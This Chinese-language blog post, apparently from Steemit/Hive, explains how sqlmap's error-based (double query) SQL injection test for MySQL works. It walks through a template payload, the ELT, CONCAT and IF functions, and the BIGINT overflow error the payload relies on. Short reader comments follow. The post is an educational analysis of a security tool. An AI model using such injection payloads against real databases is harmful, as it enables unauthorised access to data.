SQLMAP Part 1

in #cn6 years ago

SQLMAP Part 1

<p dir="auto"><center><img src="https://images.hive.blog/768x0/https://cdn.steemitimages.com/DQmQ2LNT1quvZ4ywpQQicSxtHSf6SnVPqbMQv5BqaT8B4wD/image.png" srcset="https://images.hive.blog/768x0/https://cdn.steemitimages.com/DQmQ2LNT1quvZ4ywpQQicSxtHSf6SnVPqbMQv5BqaT8B4wD/image.png 1x, https://images.hive.blog/1536x0/https://cdn.steemitimages.com/DQmQ2LNT1quvZ4ywpQQicSxtHSf6SnVPqbMQv5BqaT8B4wD/image.png 2x" /> <p dir="auto">放上大佬写的一个流程图 <p dir="auto"><center><img src="https://images.hive.blog/768x0/https://cdn.steemitimages.com/DQmYBaBMZkS2qDxQy9ttL6vAdG2kfaTnYWmwEGZdkfP2CSr/image.png" srcset="https://images.hive.blog/768x0/https://cdn.steemitimages.com/DQmYBaBMZkS2qDxQy9ttL6vAdG2kfaTnYWmwEGZdkfP2CSr/image.png 1x, https://images.hive.blog/1536x0/https://cdn.steemitimages.com/DQmYBaBMZkS2qDxQy9ttL6vAdG2kfaTnYWmwEGZdkfP2CSr/image.png 2x" /> <p dir="auto">em .... 这篇文章 只写自己注入的一个方式 error-based injection <p dir="auto">error-based也有叫做DOUBLE QUERY INJECTION,即双查询注入 <h3><center><b>Error-based tests - WHERE or HAVING clause <p dir="auto">payload 如下: <pre><code>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) <p dir="auto">其中 <p dir="auto">SELECT (ELT([RANDNUM]=[RANDNUM],1)) <p dir="auto">会返回NULL 如下: <p dir="auto"><center><img src="https://images.hive.blog/768x0/https://cdn.steemitimages.com/DQmVned9DgTG5ocw3DSV9rDYsVuvFMy5atZh2ksm5GHJ3JH/image.png" srcset="https://images.hive.blog/768x0/https://cdn.steemitimages.com/DQmVned9DgTG5ocw3DSV9rDYsVuvFMy5atZh2ksm5GHJ3JH/image.png 1x, https://images.hive.blog/1536x0/https://cdn.steemitimages.com/DQmVned9DgTG5ocw3DSV9rDYsVuvFMy5atZh2ksm5GHJ3JH/image.png 2x" /> <pre><code>SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x') <p dir="auto">ELT() 函数使用方法如下: 这张图 能很好地解释了 <p dir="auto"><center><img src="https://images.hive.blog/768x0/https://cdn.steemitimages.com/DQmdACX4Pwek7jK9vBeF4j93ZdER4oTubE4zM2CUDnckrfD/image.png" srcset="https://images.hive.blog/768x0/https://cdn.steemitimages.com/DQmdACX4Pwek7jK9vBeF4j93ZdER4oTubE4zM2CUDnckrfD/image.png 1x, https://images.hive.blog/1536x0/https://cdn.steemitimages.com/DQmdACX4Pwek7jK9vBeF4j93ZdER4oTubE4zM2CUDnckrfD/image.png 2x" /> <p dir="auto">CONCAT() 函数 如下: <pre><code>mysql> SELECT CONCAT(’My’, ‘S’, ‘QL’); -> ‘MySQL’ <p dir="auto">if() 函数用法如下: <pre><code>if(expr1,expr2,expr3) 如果 expr1 是TRUE ,则if()的返回值为expr2; 否则返回值则为 expr3。 if() 的返回值为数字值或字符串值,具体情况视其所在语境而定。 <p dir="auto">至于为什么会报错 你只要在mysql中 执行如下命令 就可以就明白了: <p dir="auto">select 3 * 8446744073709551610; <pre><code>mysql> select 3 * 8446744073709551610; ERROR 1690 (22003): BIGINT value is out of range in '(3 * 8446744073709551610)' mysql>
#cn-reader #blog #cn-curation #cn-malaysia
6 years ago in #cn by
$0.06
  • Past Payouts $0.06
  • - Author $0.05
  • - Curators $0.01
5 votes
Reply 3
Sort:  
  • Trending
    • [-]
     6 years ago  

    我们都是脚本小子

    $0.04
    • Past Payouts $0.04
    • - Author $0.04
    • - Curators $0.00
    2 votes
    Reply
    [-]
     6 years ago  

    Hi ~ I'm a robot of lynnhua.I just upvoted your post!

    Thanks so much~!! Please come visit me here: https://steemit.com/@lynnhua

    $0.00
      Reply
      [-]
       6 years ago  

      thanks

      $0.05
      • Past Payouts $0.05
      • - Author $0.04
      • - Curators $0.01
      2 votes
      Reply